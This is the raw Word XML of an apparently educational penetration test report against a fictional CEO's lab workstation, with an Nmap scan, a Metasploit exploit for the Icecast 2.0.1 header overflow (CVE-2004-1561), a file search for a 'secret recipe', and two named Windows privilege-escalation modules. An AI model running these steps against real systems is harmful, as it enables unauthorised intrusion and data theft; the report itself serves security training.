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889B" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk52020430"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="565F7A6C" w14:textId="263D13E4" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Good</w:t>
      </w:r>
      <w:r w:rsidR="00722A4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security Penetration Test Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E87274" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7F23AD" w14:textId="0CB9322C" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C6784F" w14:textId="41852317" w:rsidR="001E211A" w:rsidRDefault="001E211A"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</w:rPr>
        <w:t>KeithMatlock@GoodSecurity.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991C955" w14:textId="2BA00046" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34374BE1" w14:textId="2CA7BC35" w:rsidR="001E211A" w:rsidRDefault="001E211A">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00722A4A">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>09/24/2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5C467" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AC8D71" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BB02B6" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1863F815" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E30E9B0" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4581D749" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212CD6E6" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503D050E" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF7B936" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D891F43" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40813497" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CB6A62" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BD102A" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21D794" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365804B6" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B97994" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7A1D34" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BEFFB9" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48654003" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F558AD4" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBBDBC1" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>High-Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA54F4" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC9E650" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was tasked with performing an internal penetration test on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The goal of this test is to perform attacks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> those of a hacker and attempt to infiltrate Hans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">computer </w:t>
      </w:r>
      <w:r>
        <w:t>to determine if it is at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> risk. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> overall objective was to exploit any vulnerable software, find a secret recipe file on Hans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">computer, and report the findings back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78956473" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The internal penetration test found several alarming vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>on Hans</w:t>
      </w:r>
      <w:r>
        <w:t>’ computer: W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hen performing the attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to gain access to his machine and find the secret recipe file by exploiting two programs with major vulnerabilities. The details of the attack are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B845E" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451D5E8" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5287CAE5" w14:textId="5A481185" w:rsidR="00E95EDE" w:rsidRPr="00C24335" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24335">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Machine IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4F42F" w14:textId="5A1D0A9D" w:rsidR="00607AB7" w:rsidRDefault="00607AB7">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60716C" w14:textId="77777777" w:rsidR="00E95EDE" w:rsidRPr="00C24335" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24335">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07637F90" w14:textId="3C87A73F" w:rsidR="00607AB7" w:rsidRDefault="00607AB7">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607AB7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B27E88A" wp14:editId="0510C902">
            <wp:extent cx="1648055" cy="73352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B835" w14:textId="77777777" w:rsidR="00607AB7" w:rsidRPr="00C24335" w:rsidRDefault="00607AB7">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0876AFD2" w14:textId="0F217DD3" w:rsidR="00E95EDE" w:rsidRPr="00C24335" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24335">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8E5BD" w14:textId="7ADE2F8B" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.0.1 Win x86 – Header Overwrite Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05B65B" w14:textId="4F553037" w:rsidR="00E95EDE" w:rsidRPr="00C24335" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24335">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122795C2" w14:textId="2E867097" w:rsidR="00861175" w:rsidRDefault="00F27608">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2004-1561 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer overflow in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB2A6B" w14:textId="77777777" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C5348C" w14:textId="77777777" w:rsidR="00607AB7" w:rsidRDefault="00607AB7">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3946563D" w14:textId="6FFC0127" w:rsidR="00E95EDE" w:rsidRPr="00607AB7" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607AB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414C78C" w14:textId="2C65D924" w:rsidR="001A266E" w:rsidRDefault="001A266E">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>This is a severe exploit, users using this exploit could gain remote access to the workstati</w:t>
      </w:r>
      <w:r w:rsidR="00607AB7">
        <w:t>on. Users could then view, and exfiltrate any files they have access to.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC8C15" w14:textId="02CCE0B1" w:rsidR="00E95EDE" w:rsidRPr="00CC145C" w:rsidRDefault="00A4045D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC145C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D49FB3" w14:textId="3F6F41AE" w:rsidR="00C24335" w:rsidRDefault="00C24335">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Performed a service and version scan with Nmap against the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3778E5" w14:textId="3F94520D" w:rsidR="00C24335" w:rsidRDefault="00C24335">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C8614" w14:textId="2E8AF041" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC145C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F0C0A4A" wp14:editId="683E0677">
            <wp:extent cx="5943600" cy="2246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74A" w14:textId="501D75BA" w:rsidR="00C24335" w:rsidRDefault="00C24335">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC145C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC145C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC145C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we fo</w:t>
      </w:r>
      <w:r w:rsidR="00CC145C">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00CC145C">
        <w:t xml:space="preserve"> possible exploits of the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F89F1" w14:textId="153A53D0" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC145C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5705BC02" wp14:editId="0ED9006B">
            <wp:extent cx="5943600" cy="2494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2AD9" w14:textId="77777777" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A9D002" w14:textId="77777777" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B67BBD" w14:textId="77777777" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E157B58" w14:textId="77777777" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3224DD8B" w14:textId="77777777" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AE13F9" w14:textId="4B53E7C0" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Used Metasploit module to runs the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C57391A" w14:textId="7FF40CE4" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC145C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B12B92" wp14:editId="022BB24A">
            <wp:extent cx="5943600" cy="1826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79D8" w14:textId="628FAAD5" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Checking to see if this is a VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9995C1" w14:textId="2FC46F74" w:rsidR="003E5DAA" w:rsidRDefault="003E5DAA">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="003E5DAA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF47668" wp14:editId="466F2F46">
            <wp:extent cx="5572903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AA79" w14:textId="492DFFE9" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running the exploit, we now have access to the </w:t>
      </w:r>
      <w:r w:rsidR="00B55B06">
        <w:t>workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF768C" w14:textId="72DAED0C" w:rsidR="00B55B06" w:rsidRDefault="00B55B06">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00B55B06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08CDA684" wp14:editId="6DB9EBD1">
            <wp:extent cx="5943600" cy="3950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6A17" w14:textId="77777777" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517A858D" w14:textId="77777777" w:rsidR="00CC145C" w:rsidRDefault="00CC145C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7776BC4A" w14:textId="2122687B" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400F0B6E" w14:textId="395B196B" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Search for .txt files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C032C" w14:textId="1D0E2920" w:rsidR="00E95EDE" w:rsidRDefault="002B26B2">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Search -f *.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5847B0DD" w14:textId="43FD75DA" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Located in the Documents folder of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IEUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D9EFB9E" w14:textId="4FC10320" w:rsidR="00861175" w:rsidRDefault="00861175">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00861175">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3445E9" wp14:editId="196AE17A">
            <wp:extent cx="4372585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B054" w14:textId="0C98A0D1" w:rsidR="00557001" w:rsidRPr="004E113C" w:rsidRDefault="00557001">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E113C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other Vulnerabilities were found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC25BFE" w14:textId="75D017C2" w:rsidR="003E5DAA" w:rsidRDefault="004E113C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit/windows/local</w:t>
      </w:r>
      <w:r w:rsidR="00483D66">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ikeext_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B2C58B3" w14:textId="21DD9DB6" w:rsidR="00483D66" w:rsidRDefault="00483D66">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>This exploit allows the Actors to replace a malicious library with the corresponding name and the library will be loaded by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D520C5C" w14:textId="3EAE04B7" w:rsidR="00E95EDE" w:rsidRDefault="004E113C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit/windows/local/ms16_075_reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F7AE42" w14:textId="0E83A72C" w:rsidR="004E113C" w:rsidRDefault="004E113C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>This exploit allows the Actors to easily use incognito to impersonate the token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8940B5" w14:textId="7EFE4398" w:rsidR="00E95EDE" w:rsidRDefault="00E95EDE">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B742550" w14:textId="2489A664" w:rsidR="00F357A6" w:rsidRDefault="00F357A6">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22844F2D" w14:textId="50CF56BA" w:rsidR="00E95EDE" w:rsidRDefault="00886C25">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r w:rsidRPr="00886C25">
        <w:drawing>
